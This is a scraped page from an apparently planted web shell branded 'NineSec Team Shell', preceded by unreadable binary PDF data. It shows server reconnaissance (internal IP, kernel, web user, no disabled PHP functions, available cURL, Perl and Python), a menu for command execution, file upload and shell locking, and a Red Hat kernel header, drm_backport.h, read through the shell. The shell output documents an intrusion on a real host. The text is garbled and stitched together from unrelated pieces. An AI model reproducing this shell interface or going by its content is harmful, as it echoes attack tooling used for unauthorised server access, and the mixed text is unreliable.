%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 10.0.3.46  /  Your IP : 172.70.100.161
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
System : Linux ukmjuara 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : apache ( 48)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON
Directory (0755) :  /usr/src/kernels/3.10.0-957.10.1.el7.x86_64/include/drm/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //usr/src/kernels/3.10.0-957.10.1.el7.x86_64/include/drm/drm_backport.h
/*
 * Copyright (C) 2013 Red Hat
 *
 * This file is subject to the terms and conditions of the GNU General Public
 * License v2. See the file COPYING in the main directory of this archive for
 * more details.
 */

#ifndef DRM_BACKPORT_H_
#define DRM_BACKPORT_H_

#include <linux/hrtimer.h>
#include <linux/err.h>
#include <linux/io.h>
#include <linux/console.h>
#include <linux/refcount.h>


#include <linux/time64.h>
static inline time64_t ktime_get_real_seconds(void)
{
	return get_seconds();
}

/**
 * ktime_mono_to_real - Convert monotonic time to clock realtime
 */
static inline ktime_t ktime_mono_to_real(ktime_t mono)
{
	return ktime_sub(mono, ktime_get_monotonic_offset());
}

static inline void get_monotonic_boottime64(struct timespec64 *ts)
{
	*ts = ktime_to_timespec64(ktime_get_boottime());
}

/*
 *
 */

/**
 * list_last_entry - get the last element from a list
 * @ptr:	the list head to take the element from.
 * @type:	the type of the struct this is embedded in.
 * @member:	the name of the list_struct within the struct.
 *
 * Note, that list is expected to be not empty.
 */
#define list_last_entry(ptr, type, member) \
	list_entry((ptr)->prev, type, member)


#define module_param_named_unsafe(name, value, type, perm)		\
	module_param_named(name, value, type, perm)
#define module_param_unsafe(name, type, perm)			\
	module_param(name, type, perm)

/*
 *
 */

#include <linux/mm.h>

#define SHRINK_STOP (~0UL)
/*
 * A callback you can register to apply pressure to ageable caches.
 *
 * @count_objects should return the number of freeable items in the cache. If
 * there are no objects to free or the number of freeable items cannot be
 * determined, it should return 0. No deadlock checks should be done during the
 * count callback - the shrinker relies on aggregating scan counts that couldn't
 * be executed due to potential deadlocks to be run at a later call when the
 * deadlock condition is no longer pending.
 *
 * @scan_objects will only be called if @count_objects returned a non-zero
 * value for the number of freeable objects. The callout should scan the cache
 * and attempt to free items from the cache. It should then return the number
 * of objects freed during the scan, or SHRINK_STOP if progress cannot be made
 * due to potential deadlocks. If SHRINK_STOP is returned, then no further
 * attempts to call the @scan_objects will be made from the current reclaim
 * context.
 *
 * @flags determine the shrinker abilities, like numa awareness
 */
struct shrinker2 {
	unsigned long (*count_objects)(struct shrinker2 *,
				       struct shrink_control *sc);
	unsigned long (*scan_objects)(struct shrinker2 *,
				      struct shrink_control *sc);

	int seeks;	/* seeks to recreate an obj */
	long batch;	/* reclaim batch size, 0 = default */
	unsigned long flags;

	/* These are for internal use */
	struct list_head list;
	/* objs pending delete, per node */
	atomic_long_t *nr_deferred;

	/* compat: */
	struct shrinker compat;
};
int register_shrinker2(struct shrinker2 *shrinker);
void unregister_shrinker2(struct shrinker2 *shrinker);

#define shrinker            shrinker2
#define register_shrinker   register_shrinker2
#define unregister_shrinker unregister_shrinker2

/*
 *
 */

extern struct workqueue_struct *system_power_efficient_wq;


/*
 *
 */

#include <linux/rculist.h>

#define cpu_relax_lowlatency() cpu_relax()
#define pagefault_disabled()   in_atomic()

static inline int arch_phys_wc_index(int handle)
{
#ifdef CONFIG_X86
	int phys_wc_to_mtrr_index(int handle);
	return phys_wc_to_mtrr_index(handle);
#else
	return -1;
#endif
}

/*
 * avoiding/emulating 87521e16a7abbf3fa337f56cb4d1e18247f15e8a upstream:
 */

enum acpi_backlight_type {
	acpi_backlight_undef = -1,
	acpi_backlight_none = 0,
	acpi_backlight_video,
	acpi_backlight_vendor,
	acpi_backlight_native,
};

static inline enum acpi_backlight_type acpi_video_get_backlight_type(void)
{
	int acpi_video_backlight_support(void);
#if IS_ENABLED(CONFIG_ACPI_VIDEO)
	bool acpi_video_verify_backlight_support(void);
	if (acpi_video_backlight_support() &&
			!acpi_video_verify_backlight_support())
		return acpi_backlight_native;
#else
	if (acpi_video_backlight_support())
		return acpi_backlight_native;
#endif
	return acpi_backlight_undef;
}

static inline bool apple_gmux_present(void) { return false; }
static inline bool vga_switcheroo_client_probe_defer(struct pci_dev *pdev) { return false; }

/* cmpxchg_relaxed */
#ifndef cmpxchg_relaxed
#define  cmpxchg_relaxed		cmpxchg
#define  cmpxchg_acquire		cmpxchg
#define  cmpxchg_release		cmpxchg
#endif

static inline int register_vmap_purge_notifier(struct notifier_block *nb)
{
	return 0;
}

static inline int unregister_vmap_purge_notifier(struct notifier_block *nb)
{
	return 0;
}

enum mutex_trylock_recursive_enum {
	MUTEX_TRYLOCK_FAILED    = 0,
	MUTEX_TRYLOCK_SUCCESS   = 1,
	MUTEX_TRYLOCK_RECURSIVE,
};

static bool mutex_is_locked_by(struct mutex *mutex, struct task_struct *task)
{
	if (!mutex_is_locked(mutex))
		return false;

#if defined(CONFIG_SMP) || defined(CONFIG_DEBUG_MUTEXES)
	return mutex->owner == task;
#else
	/* Since UP may be pre-empted, we cannot assume that we own the lock */
	return false;
#endif
}

static inline __deprecated __must_check enum mutex_trylock_recursive_enum
mutex_trylock_recursive(struct mutex *lock)
{
	/* BACKPORT NOTE:
	 * Different from upstream to avoid backporting
	 * 3ca0ff571b092ee4d807f1168caa428d95b0173b, but functionally
	 * equivalent for i915 to previous behavior
	 */
	if (unlikely(mutex_is_locked_by(lock, current)))
		return MUTEX_TRYLOCK_RECURSIVE;

	return mutex_trylock(lock);
}


/*
 * On x86 PAT systems we have memory tracking that keeps track of
 * the allowed mappings on memory ranges. This tracking works for
 * all the in-kernel mapping APIs (ioremap*), but where the user
 * wishes to map a range from a physical device into user memory
 * the tracking won't be updated. This API is to be used by
 * drivers which remap physical device pages into userspace,
 * and wants to make sure they are mapped WC and not UC.
 *
 * BACKPORT NOTES:  If:
 *
 *   87744ab3832b mm: fix cache mode tracking in vm_insert_mixed()
 *
 * gets backported, then we want to backport:
 *
 *   8ef4227615e1 x86/io: add interface to reserve io memtype for a resource range. (v1.1)
 *
 * and drop these next two stubs
 */
static inline int arch_io_reserve_memtype_wc(resource_size_t base,
					     resource_size_t size)
{
	return 0;
}

static inline void arch_io_free_memtype_wc(resource_size_t base,
					   resource_size_t size)
{
}


static inline int __must_check down_write_killable(struct rw_semaphore *sem)
{
	down_write(sem);
	return 0;
}


static inline long __drm_get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
		unsigned long start, unsigned long nr_pages, int write,
		int force, struct page **pages, struct vm_area_struct **vmas)
{
	return get_user_pages(tsk, mm, start, nr_pages, write, force, pages, vmas);
}

#define get_user_pages_remote(c, mm, start, nr_pages, write, pages, vmas, locked) \
		__drm_get_user_pages(c, mm, start, nr_pages, write, 0, pages, vmas)
#define get_user_pages(start, nr_pages, write, pages, vmas) \
	__drm_get_user_pages(current, current->mm, start, nr_pages, write, 0, pages, vmas)


#define smp_store_mb(var, value)	set_mb(var, value)

#ifndef atomic_set_release
#define  atomic_set_release(v, i)	smp_store_release(&(v)->counter, (i))
#endif

#ifdef CONFIG_X86
#ifndef atomic_andnot
static inline void atomic_andnot(int i, atomic_t *v)
{
	atomic_and(~i, v);
}
#endif
#endif

/* drm_panel stubs to make i915 happy.. I don't think we support any hw
 * using DSI and panel stuff without some work will be unhappy on power
 * or anything else w/ CONFIG_OF..
 */
struct drm_panel;
struct drm_connector;
static inline void drm_panel_init(struct drm_panel *panel) {}
static inline int drm_panel_attach(struct drm_panel *panel, struct drm_connector *connector)
{
	return -ENXIO;
}
static inline int drm_panel_detach(struct drm_panel *panel)
{
	return 0;
}
static inline int drm_panel_add(struct drm_panel *panel)
{
	return -ENXIO;
}
static inline void drm_panel_remove(struct drm_panel *panel) {}

typedef wait_queue_t wait_queue_entry_t;
#define __add_wait_queue_entry_tail __add_wait_queue_tail

unsigned int swiotlb_max_size(void);
#define swiotlb_max_segment swiotlb_max_size

#define SLAB_TYPESAFE_BY_RCU SLAB_DESTROY_BY_RCU

#include <linux/fs.h>

static inline int call_mmap(struct file *file, struct vm_area_struct *vma)
{
	return file->f_op->mmap(file, vma);
}

static inline void mmgrab(struct mm_struct *mm)
{
	atomic_inc(&mm->mm_count);
}

/*
 * since we just use get_user()/put_user() for unsafe_put_user()
 * and unsafe_get_user(), these can be no-op
 */
#define user_access_begin() do {} while (0)
#define user_access_end()   do {} while (0)

#define unsafe_put_user(x, ptr, err_label)	\
do {						\
	int __pu_err = put_user(x, ptr);	\
	if (unlikely(__pu_err)) goto err_label;	\
} while (0)

#define unsafe_get_user(x, ptr, err_label)	\
do {						\
	int __gu_err = get_user(x, ptr);	\
	if (unlikely(__gu_err)) goto err_label;	\
} while (0)

/*
 * We don't have the commits in the rhel7 kernel which necessitate
 * this flag, so it is just zero.  Define it as an enum so if someone
 * does backport the pci/pm patches, it won't go unnoticed that this
 * needs to be removed.  See bac2a909a096c9110525c18cbb8ce73c660d5f71
 * and 4d071c3238987325b9e50e33051a40d1cce311cc upstream.
 */
enum {
	PCI_DEV_FLAGS_NEEDS_RESUME = 0,
};

#define get_random_u32() ((u32)get_random_int())
#define dev_pm_set_driver_flags(...) do { } while (0)
#define __GFP_RETRY_MAYFAIL __GFP_REPEAT

/* TODO partial backport of a55bbd375d1802141f0f043e2cd08f85c23d6209 */
#define idr_for_each_entry_continue(idp, entry, id)                    \
       for ((entry) = idr_get_next((idp), &(id));                      \
            entry;                                                     \
            ++id, (entry) = idr_get_next((idp), &(id)))

/* until 8eb8284b412906181357c2b0110d879d5af95e52 is backported: */
#define kmem_cache_create_usercopy(n, s, a, f, uo, us, c) \
	kmem_cache_create(n, s, a, f, c)

int __init drm_backport_init(void);
void __exit drm_backport_exit(void);

#undef pr_fmt

#endif /* DRM_BACKPORT_H_ */

NineSec Team - 2022